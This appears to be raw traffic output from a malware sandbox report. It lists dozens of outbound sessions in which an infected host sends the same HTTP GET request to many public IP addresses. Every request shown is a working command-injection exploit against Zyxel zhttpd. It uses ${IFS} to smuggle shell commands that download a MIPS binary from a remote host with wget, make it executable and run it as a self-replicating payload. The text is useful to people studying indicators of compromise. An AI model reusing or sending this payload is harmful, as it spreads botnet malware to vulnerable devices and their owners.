                                                Jan 28, 2024 10:16:28.865535975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5247192.168.2.2350504120.120.37.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865555048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5248192.168.2.2338266132.101.219.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865608931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5249192.168.2.233776495.75.141.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865638971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5250192.168.2.2339680130.170.224.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865664959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5251192.168.2.233450895.213.145.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865689039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5252192.168.2.2348508176.0.192.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865732908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5253192.168.2.2344626102.35.160.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865746975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5254192.168.2.234668060.251.185.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865782976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5255192.168.2.2338384211.51.178.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865796089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5256192.168.2.233694457.244.226.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865840912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5257192.168.2.2349534207.117.229.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865865946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5258192.168.2.233389659.93.49.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865870953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5259192.168.2.2358564147.210.181.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865902901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5260192.168.2.235563214.84.182.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865916967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5261192.168.2.235510013.17.218.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865921974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5262192.168.2.2334586147.37.234.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865955114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5263192.168.2.233325870.27.167.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865987062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5264192.168.2.2348324159.134.163.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866028070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5265192.168.2.234888418.83.93.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866044044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5266192.168.2.235896497.120.5.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866055965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5267192.168.2.2341864182.47.180.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866086006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5268192.168.2.2342870148.216.12.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866132975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5269192.168.2.2339758150.215.191.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866173029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5270192.168.2.2352276196.40.53.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866189957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5271192.168.2.2348238134.231.143.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866223097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5272192.168.2.2347900132.63.145.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866235018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5273192.168.2.234725238.217.99.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866255999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5274192.168.2.234734898.92.179.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866277933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5275192.168.2.2344242149.77.142.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866323948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5276192.168.2.2337674212.103.205.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866354942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5277192.168.2.236035669.154.173.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866363049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5278192.168.2.2343614152.121.255.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866385937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5279192.168.2.235047469.3.36.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866410971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5280192.168.2.2354754197.165.196.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866436005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5281192.168.2.2341734105.77.160.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866457939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5282192.168.2.2353574179.234.199.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866492987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5283192.168.2.234315490.224.95.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866519928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5284192.168.2.233316217.1.62.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866530895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5285192.168.2.2359612167.63.82.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866571903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5286192.168.2.2352872163.129.121.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866599083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5287192.168.2.2349530207.150.155.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866611004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5288192.168.2.233301643.163.26.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866643906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5289192.168.2.2337200221.231.6.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866664886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5290192.168.2.233327294.133.12.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866677046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5291192.168.2.2351338111.103.79.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866733074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5292192.168.2.2332908216.255.10.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866734028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5293192.168.2.2356450135.32.117.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866763115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5294192.168.2.234996243.79.254.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866794109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5295192.168.2.236099496.156.187.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866815090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5296192.168.2.2340792132.210.127.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866849899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5297192.168.2.2352010142.252.13.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866885900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5298192.168.2.235573612.124.98.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866899014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5299192.168.2.233987459.134.21.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866935968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5300192.168.2.235401895.56.182.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866950035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5301192.168.2.2336940108.238.85.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866966009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5302192.168.2.2339126133.125.234.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.866966009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5303192.168.2.2358354120.230.26.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867021084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5304192.168.2.2334654109.47.20.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867043018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5305192.168.2.2340106133.99.162.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867069006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5306192.168.2.2334214107.239.218.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867119074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5307192.168.2.2356452187.98.90.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867144108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5308192.168.2.233442473.244.253.237443
                                                TimestampBytes transferredDirectionData
